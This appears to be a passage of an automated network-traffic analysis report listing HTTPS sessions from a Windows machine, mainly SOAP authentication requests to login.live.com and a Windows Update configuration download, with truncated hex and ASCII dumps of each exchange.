2024-07-26 18:09:34 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-26 18:09:35 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 26 Jul 2024 18:08:34 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C518_BAY x-ms-request-id: 25de496c-0137-4565-a4ce-09a948cd866d PPServer: PPV: 30 H: PH1PEPF00011F51 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 26 Jul 2024 18:09:34 GMT Connection: close Content-Length: 11390
2024-07-26 18:09:35 UTC	11390	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49717	40.126.32.136	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:09:36 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-07-26 18:09:36 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-26 18:09:36 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 26 Jul 2024 18:08:36 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C555_SN1 x-ms-request-id: 0554cdab-1853-49bb-8cdf-f6e6a6711b6b PPServer: PPV: 30 H: SN1PEPF0002FA2F V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 26 Jul 2024 18:09:35 GMT Connection: close Content-Length: 1919
2024-07-26 18:09:36 UTC	1919	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49719	40.126.32.136	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:09:37 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-07-26 18:09:37 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-26 18:09:38 UTC	653	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 26 Jul 2024 18:08:37 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30293.2 Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C518_BAY x-ms-request-id: 6fba1ba0-8f5f-45da-8336-0d0bb3880ce6 PPServer: PPV: 30 H: PH1PEPF00018375 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 26 Jul 2024 18:09:37 GMT Connection: close Content-Length: 11369
2024-07-26 18:09:38 UTC	11369	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49718	40.126.32.136	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:09:37 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-07-26 18:09:37 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-26 18:09:37 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 26 Jul 2024 18:08:37 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C555_BAY x-ms-request-id: 8b5caa71-ec7a-4220-b3b7-0121bcb645b0 PPServer: PPV: 30 H: PH1PEPF00011D16 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 26 Jul 2024 18:09:36 GMT Connection: close Content-Length: 1918
2024-07-26 18:09:37 UTC	1918	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49720	40.126.32.136	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:09:39 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-07-26 18:09:39 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-26 18:09:39 UTC	653	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 26 Jul 2024 18:08:39 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30293.2 Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C518_BAY x-ms-request-id: de4a88db-c90e-4544-83f9-9d21d693305d PPServer: PPV: 30 H: PH1PEPF00011DB3 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 26 Jul 2024 18:09:39 GMT Connection: close Content-Length: 11369
2024-07-26 18:09:39 UTC	11369	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49721	40.126.32.136	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:09:40 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-07-26 18:09:40 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-07-26 18:09:41 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 26 Jul 2024 18:08:41 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C518_BAY x-ms-request-id: a1d961f1-3d76-40e9-8b29-f328ecdde124 PPServer: PPV: 30 H: PH1PEPF00011F58 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 26 Jul 2024 18:09:41 GMT Connection: close Content-Length: 11370
2024-07-26 18:09:41 UTC	11370	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49723	52.165.165.26	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:09:55 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1p5G+81pvP7punU&MD=N3O13Xaa HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-07-26 18:09:56 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 7e500bbb-6e66-4f1d-bffb-00a6c708325c MS-RequestId: 7deb839c-c032-4811-8372-8538c92ad8eb MS-CV: 5y2aZCrtjEe9xhon.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 26 Jul 2024 18:09:55 GMT Connection: close Content-Length: 30005
2024-07-26 18:09:56 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
